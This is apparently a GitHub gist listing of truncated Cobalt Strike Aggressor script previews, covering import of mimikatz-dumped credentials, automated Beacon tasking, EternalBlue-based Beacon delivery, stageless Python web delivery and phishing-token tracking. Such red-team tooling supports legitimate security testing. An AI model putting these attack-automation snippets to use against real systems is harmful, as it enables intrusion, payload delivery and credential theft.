Raphael rsmudge
rsmudge
/ mkimport.cna
Created
January 14, 2021 20:17
import creds from a file with mimikatz output.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import mimikatz creds from a file. | |
| # go to View -> Script Console | |
| # load this script | |
| # type importcreds /path/to/file.txt | |
| sub process { | |
| if ($luser eq "(null)" || $luser eq "") { | |
| return; | |
| } |
rsmudge
/ checkit.cna
Created
September 18, 2020 16:44
Fire a beacon_revisited event when we get a checkin event that occurs some window of time (e.g., 60s here) after the last checkin event. Keep in mind checkin is only fired on task acknowledgement. If you set the window to 8 hours and don't interact with the Beacon for 8 hours--you'll fire revisited.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| global('%checkins'); | |
| on beacon_checkin { | |
| local('$last'); | |
| if ($1 in %checkins) { | |
| $last = %checkins[$1]; | |
| # has it been 1m since the last task acknowledgement? | |
| if (($3 - $last) > 60000) { |
rsmudge
/ search.cna
Last active
May 3, 2024 16:02
Search scrollback for a Beacon (even the stuff that's cut off)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # search for and reproduce output that matches a specific regex. | |
| alias search { | |
| local('$regex $regex2 $entry $event $bid $out $when'); | |
| # take all of the args, without processing/parsing as normal. | |
| if (strlen($0) > 7) { | |
| $regex = substr($0, 7); | |
| } | |
| else { | |
| berror($1, "search [regex]"); |
rsmudge
/ callany.cna
Last active
July 21, 2020 20:46
Create a hidden Beacon console and pass a command+args to it for execution.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import aggressor.windows.BeaconConsole; | |
| import java.awt.event.ActionEvent; | |
| # $1 = beacon ID | |
| # $2 = command + args to run [as if you typed it in the console] | |
| sub beacon_input_command { | |
| local('$event'); | |
| # we make the console a static var because each console we create subscribes to a bunch of stuff | |
| # and requires a manual step [normally performed by a Window close event] to clean up these things. |
rsmudge
/ initial.cna
Created
February 20, 2019 20:33
How to automate Beacon to execute a sequence of tasks with each checkin...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Demonstrate how to queue tasks to execute with each checkin... | |
| # | |
| # | |
| # yield tells a function to pause and return a value. The next time the same instance of the | |
| # function is called, it will resume after where it last yielded. | |
| # | |
| sub stuffToDo { | |
| # Tasks for first checkin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # demonstrate how to add a popup handler to a Swing component in Sleep | |
| import java.awt.*; | |
| import javax.swing.*; | |
| import javax.swing.event.*; | |
| # safely add a listener to show a popup | |
| sub setupPopupMenu { | |
| # we're using fork({}) to run this in a separate Aggressor Script environment. |
rsmudge
/ safedelete.cna
Created
September 1, 2017 16:56
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # safe delete in file browser right-click menu | |
| # | |
| popup_clear("filebrowser"); | |
| popup filebrowser { | |
| item "&Download" { | |
| local('$file'); | |
| foreach $file ($3) { | |
| bdownload($1, "$2 $+ \\ $+ $file"); |
rsmudge
/ eternalblue.cna
Last active
August 18, 2024 18:23
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # script to help move around with ms17-010 from Metasploit | |
| # Go to Attacks -> Eternal Blue | |
| # | |
| # target, listener, where to save .rc file | |
| sub generate_rc_file { | |
| local('$target $listener $where $handle $shellcode'); | |
| ($target, $listener, $where) = @_; |
rsmudge
/ stagelesspython.cna
Created
April 26, 2017 18:15
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python Stageless Scripted Web Delivery | |
| # setup our stageless Python Web Delivery attack | |
| sub setup_attack { | |
| local('%options $x86payload $x64payload $url $script'); | |
| %options = $3; | |
| # generate our stageless x86 payload | |
| artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
| yield; |
rsmudge
/ tokenToEmail.cna
Created
March 31, 2017 21:58
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This script overrides WEB_HIT and PROFILER_HIT from default.cna to | |
| # resolve the id var (token) to an email | |
| # | |
| # https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html | |
| # | |
| # method, uri, addr, ua, response, size, handler, when | |
| set WEB_HIT { | |
| local('$out $now $method $uri $addr $ua $response $size $handler $when $params'); |
NewerOlder